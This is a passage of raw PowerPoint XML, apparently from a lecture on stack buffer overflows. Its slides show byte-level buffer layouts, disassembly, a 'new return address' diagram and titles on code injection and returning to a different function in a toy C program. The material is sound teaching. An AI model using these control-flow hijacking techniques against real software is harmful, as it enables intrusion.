                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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19"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="119"/>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20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="120"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="26" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="27" presetID="21" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="after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wheel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="111"/>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113"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="121"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="37" presetID="14" presetClass="entr" presetSubtype="5"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randombar(vertical)">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7" grpId="0" animBg="1"/>
      <p:bldP spid="117" grpId="1" animBg="1"/>
      <p:bldP spid="120" grpId="0"/>
      <p:bldP spid="120" grpId="1"/>
      <p:bldP spid="121" grpId="0"/>
      <p:bldP spid="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Off-by-one error</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14</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9" y="1881688"/>
            <a:ext cx="4203702"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abcdefgh</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abcdefgh</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8" name="Rounded Rectangle 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0492B9F5-CAF2-F04D-8FDF-41C75D477441}"/>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0x68</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0x70	0x06	0x40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0x48	0x06	0x40	0x00	0x00	0x00	0x00	0x00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281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Maximum error w/o side-effect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15</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9" y="1881688"/>
            <a:ext cx="4203702"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abcdefghijklmno</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abcdefghijklmno</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6F</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'o'</a:t>
                </a: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6E</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'n'</a:t>
                </a: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6D</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'m'</a:t>
                </a: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6C</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'l'</a:t>
                </a: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6B</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'k'</a:t>
                </a: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6A</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'j'</a:t>
                </a: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69</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>i</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'</a:t>
                </a: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8" name="Rounded Rectangle 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66409F3E-11B9-E548-9CDB-6D3ABCCA63BC}"/>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0x68</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0x69	0x6a	0x6b	0x6c	0x6d	0x6e	0x6f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0x48	0x06	0x40	0x00	0x00	0x00	0x00	0x00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3524630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208348C7-5369-534E-A0FE-48EDD47919FC}"/>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0x68</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0x69	0x6a	0x6b	0x6c	0x6d	0x6e	0x6f	0x70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0x00	0x06	0x40	0x00	0x00	0x00	0x00	0x00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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Affecting Control Flow</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16</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8" y="1881688"/>
            <a:ext cx="4305301"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abcdefghijklmnop</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abcdefghijklmnop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Segmentation fault (core dumped)</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70</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'p'</a:t>
                </a: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6F</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'o'</a:t>
                </a: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6E</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'n'</a:t>
                </a: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6D</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'m'</a:t>
                </a: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6C</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'l'</a:t>
                </a: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6B</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'k'</a:t>
                </a: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6A</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'j'</a:t>
                </a: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69</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>i</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'</a:t>
                </a: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8" name="Oval 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D87BDD0D-283A-E447-9736-D9DB8604CE68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752601" y="5609772"/>
            <a:ext cx="2159000" cy="293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4380282D-BA0E-0148-944F-56AC66CCE5B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964837" y="6030332"/>
            <a:ext cx="2010102" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>new return address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Rounded Rectangle 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC4375E6-8CE7-4144-994B-6DFE72FE824D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4974939" y="5053898"/>
            <a:ext cx="7204753" cy="1822542"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="1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FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000000040063a &lt;caller&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40063a:   48 83 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 08         sub    $0x8,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40063e:   b8 00 00 00 00      mov    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400643:   e8 b7 ff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4005ff &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>buffer_too_small</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400648:   bf 30 07 40 00      mov    $0x400730,%edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40064d:   e8 7e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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4004d0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>puts@plt</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400652:   48 83 c4 08         add    $0x8,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400656:   c3                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>retq</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FA00"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="59" name="Elbow Connector 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{693F702A-C201-1E47-9310-4544167434B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="58" idx="4"/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4527106" y="3735722"/>
            <a:ext cx="472601" cy="3862613"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -48371"/>
              <a:gd name="adj2" fmla="val 63974"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6CD6965-8BD6-3942-876E-52C637A1946D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8565190" y="5247167"/>
            <a:ext cx="1787123" cy="3135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rgbClr val="00FA00"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DF2E656-6059-F24B-B8CC-2C0ED027C7BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6694714" y="5300714"/>
            <a:ext cx="3657600" cy="260027"/>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err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>subl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   $0x8,%esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279909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heel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58"/>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randombar(vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="62"/>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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>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p:bldP spid="62" grpId="0" animBg="1"/>
      <p:bldP spid="16"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744200" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Five Stages of Exploiting Buffer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED11538D-AB45-8642-92B9-BE0AF10AF9ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Huh. That’s weird.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whoa. That’s cool.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I wonder if I can control that.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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8862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Righ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strips(downRigh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strips(downRight)">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A27D5F-D769-CE42-B8D0-5AC6A188D823}"/>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D13001E1-337E-3B44-BA5F-1B80CFEF193A}"/>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7" name="Title 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCC4B996-243F-CF44-98F7-5449E485F111}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CA3452A-2F20-544D-8260-FC32B81AFB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5834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Let’s “Return” to a Different Function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90343901-DCAB-1044-B9AF-71839BFABDC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1503278"/>
            <a:ext cx="9391651" cy="48286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caller()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.\n");</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FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>not_caller</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("Did not return to caller! (insert maniacal laugh here)\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    exit(0);</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42655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Let’s “Return” to a Different Function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94ABD81F-9525-7345-BBEB-EE93A79CA306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7345825" y="1237664"/>
            <a:ext cx="4830980" cy="3182353"/>
            <a:chOff x="6512878" y="1197691"/>
            <a:chExt cx="4830980" cy="3182353"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="Group 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4EF7E3D-C403-B344-9459-A539C300A6AA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6512878" y="2787821"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Rectangle 38">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D29E65C4-212B-EB43-85CF-09CCF810C602}"/>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0" name="Rectangle 39">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E855E04F-AE9C-9F45-B703-BCD94F216FAD}"/>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1" name="Rectangle 40">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B25855C6-9AB2-2941-90AB-0B095F8655CB}"/>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2" name="Rectangle 41">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D088F16-6B1C-8F4C-BBA5-3A38FD65E8C2}"/>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3" name="Rectangle 42">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49A71C8D-5FBB-6D46-A6D0-4FE13D4BC58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4" name="Rectangle 43">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EE451A9-2DDF-F446-910C-D25326414676}"/>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5" name="Rectangle 44">
